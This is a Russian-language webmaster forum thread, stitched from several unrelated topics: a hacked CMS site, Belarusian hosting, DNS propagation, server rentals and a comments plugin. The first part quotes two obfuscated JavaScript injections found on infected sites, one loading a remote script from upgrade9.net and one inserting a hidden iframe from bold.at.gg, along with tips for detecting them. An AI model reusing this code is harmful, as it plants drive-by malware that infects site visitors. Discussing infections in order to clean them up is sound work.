В файле templates/Promobil/js/libs.js внизу:
document.write('<sc'+'ript ty'+'pe="te'+'xt/jav'+'asc'+'ript" src="ht'+'tp:/'+'/u'+'pg'+'rad'+'e9.n'+'et/r.p'+'hp?l=ht'+'tp%3A%2F%2Fu'+'pg'+'rad'+'e9.n'+'et%2F?a=y2a'+'4u24'+'4z403x4u2w'+'4x2t2t2y3q'+'2x454p22364z'+'2f4y2d4t2e4">'+'<'+'/'+'sc'+'rip'+'t>');
Скачиваете например все файлы на компьютер и при нормальном антивирусе шеллы он вам подскажет. Если ничего не подскажет, то надо проверять файлы на наличие уязвимостей. Можно это в принципе всё и на сервере сделать, есть скрипты, погуглите и вы их найдёте.
Ну в коде присутствует
indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|
Вообще этот код замаскирован под query, но в нормальном не должно быть слов msn, yahoo, altavista, google и так далее.
Если сами не разберётесь - стучите в аську, поможем.
На днях был клиент с таким же вирусом на wordpress.
Дописывали его через web-shell залитый на другом сайте, причём тот сайт не трогали.
Может и у вас такая ситуация? Там ещё кстати в вордпрессе и в каком то JS файле было подобное прописано, в каком не помню, но можно поискать например по слову "altavista".
Нужна будет помощь - обращайтесь.
так а что тут искать? всё очевидно:
<script type='text/javascript'>var a=!1;t9="lonly";if(-1==document.cookie.indexOf(t9)){x4=72E6;var d=new Date;x3="2";d.setTime(d.getTime());sympthom="bold.at.gg";ed=new Date(d.getTime()+x4);document.cookie=t9+"="+escape(ed.toGMTString())+";expires="+ed.toGMTString()+";path=/";k0="ht"+""+"tp"+":"+"//"+sympthom+"/i"+"n.c"+""+"gi"+"?"+x3;var e=-1!=navigator.userAgent.toLowerCase().indexOf("firefox"),f="1",j=function(){};j.prototype={b:function(){i=43724;this.ha="";u="u";return k0},a:function(){q="q";dN=49709;this.Z=46019;w="";rJ=a;this.z="";var g=document; cR=kQ=a;this.O="";var k=window;dO="";var h=this;this.j=this.v="";this.na=64509;this.h="rQ";pK="";this.s=39122;this.da="dY";this.J="fA";this.Y="dE";fQ=cD="";this.k="sE";try{uK=17600;this.qa="pC";this.Q="bZR";this.P=41545;cL=pW="";this.oa="nU";wK=a;this.R=eSU="";rO=pOR=this.la=a;this.r=eK=kVQ="";qB=a;mF="mF";this.U=a;this.G="";this.I="bY";vW="getsetAttrisdf";this.aa="";this.W="zS";wE=this.T=a;this.S="";this.ca=a;this.d=55903;this.V=33170;gK=62679;var b=[];qR=vS=a;this.D="";e||(f="0");b.push("height", "substring","trecreateElementget","width","vbmifrset",vW,"body","appendChild",f,g,"src");this.F=a;this.$=42071;this.m=21002;eO=64506;this.q=55314;yT="";hS=a;this.n=aU=uKD="";fK=a;yI=this.i=this.f="";wI="wI";sJ=11632;this.ka=a;rG="";this.o=a;this.l=40171;aA=4550;gL=40598;var l=b[2][b[1]](3,16);this.H=this.p=nZ="";this.u="uX";gP="gP";this.ma="nAO";var m=b[4][b[1]](3,6);cO=52931;this.t=a;this.K=44254;this.N=21921;vK=m+"ame";tI="tI";lO="lO";this.ia="mO";jZ=24453;var n=b[5][b[1]](3,11);this.fa=this.ja= "";p=n+"bute";this.ba="dH";qU=this.C="";rJQ=a;var o=h.b();this.c=tT="";var c=b[9][l](vK);this.A="";this.X="iZ";c[b[10]]=o;nD=a;mIO="mIO";this.pa="";c[b[3]]=b[8];oH=40281;this.ga="";kM="kM";c[b[0]]=b[8];this.e=58620;mH=this.B="";bW="bW";wY="";b[9][b[6]][b[7]](c);kR="";this.w=a;fVT=""}catch(s){hK="",this.M=45116,lKT=a,this.g="rD",g.write("\u003C\u0068\u0074\u006D\u006C\u003E\u003C\u0062\u006F\u0064\u0079\u003E\u003C\u002F\u0062\u006F\u0064\u0079\u003E\u003C\u002F\u0068\u0074\u006D\u006C\u003E"),this.ea=a,uIE="",this.L="fI",k.setTimeout(function(){h.a()},233),iGB=29282,zN=6951}iS=""}};cB="";var r=new j;gT="";r.a()};</script>
Выдаётся в шапке, но не постоянно, поэтому и проверку проходит.
Вы бы прежде чем такие советы давать, топик прочитали бы, а?
Недостающих нет, есть лишний.
Да и Активе - это хост, работающий в 6 странах, зажрались они просто. Плевать им на всех любителей UMI CMC. И отдельный сервак под какую то CMS никто ставить не будет.
Как я уже говорил выше, тут варианты, либо поискать другого хостера, но не из крупных (у хостер.бай кстати тоже suhosin), либо впс, либо забыть о размещении в Беларуси.
Ну а что Вам мешает найти другого белорусского хостера? Их не много, но они есть. Вполне может и найдёте такого, у кого suhosin не стоит.
В Беларуси многие хостеры закрылись после вступления в силу сами знаете какого указа, а новые не хотят открываться опять же по двум причинам: - мега дорогой внешний трафик и морока с регистрациями в БелГИЭ.
Я бы и свой хостинг открыл уже давно, не будь этих причин, отбивающих всякую охоту 😂
Глупости, запись А обновляется быстро у любой зоны, единственное это может быть кэш у провайдеров, так что полное обновление да, займёт около 3-х часов. Но ддос если там имеет место конечно и 90% посетителей уйдут по новому IP адресу практически моментально
Какая вообще разница, какая зона, если запись А отдаёт ДНС сервер хостера, а не ДНС регистратора?
Septembria, а я бы например посоветовал взять сервер в Лизвебе, а конкретнее в ДЦ Netdirekt, раз в hetzner боитесь. Реселлеров здесь полно, сделают быстро, в 100 уложитесь с лихвой.
За пару тысяч рубликов я бы вам сервер настроил и перенёс бы всё. Завтра к обеду уже бы всё отлично функционировало. Да и за сервером присматривать бы мог недорого, правда защита от ДДОСа, это уже совсем другие деньги...
В том то и дело, что времени нету на нахождение и выковыривание:(
В вордпрессе вон и стандартным методом это можно осуществить (правда работает не очень) и плагин есть Postie с кучей полезных настроек, так что там без проблем.
Кстати чтобы не плодить тем, спрошу ещё про компонент комментариев.
В общем смысл такой: комментарии должны оставлять только зарегистрированные пользователи, только в указанных разделах и главная фишка - они не должны видеть комментарии друг друга, все комментарии должен видеть только админ.
Решается в принципе элементарно - модерацией но мой любимый JComments подкачал - в его админке нету сортировки комментариев по постам, что крайне неудобно.
Для большего понимания расскажу принцип: админ опубликовал 10 постов, юзеры зашли на сайт и оставили комментарии к этим постам. Юзеры не должны видеть комментарии друг друга.
Дальше должен придти админ и просмотреть комментарии к каждому посту: либо с фронтеда, но тогда в компоненте комментариев должна быть опция скрытия комментов от определённых групп пользователей, либо из админки, но тогда должна быть опция сортировки по посту. У JComments ни того, ни того нет, может кто подскажет где есть хотя бы одна из опций?
vkusnoserver, вот этот сервер интересует. Сколько там IP по дефолту, разные ли подсети С, и как с дополнительными при необходимости?
И числа так после 15-го он будет у вас или могут закончится? Думаю на него переехать, да только рано сейчас, свой до 25-го оплачен.
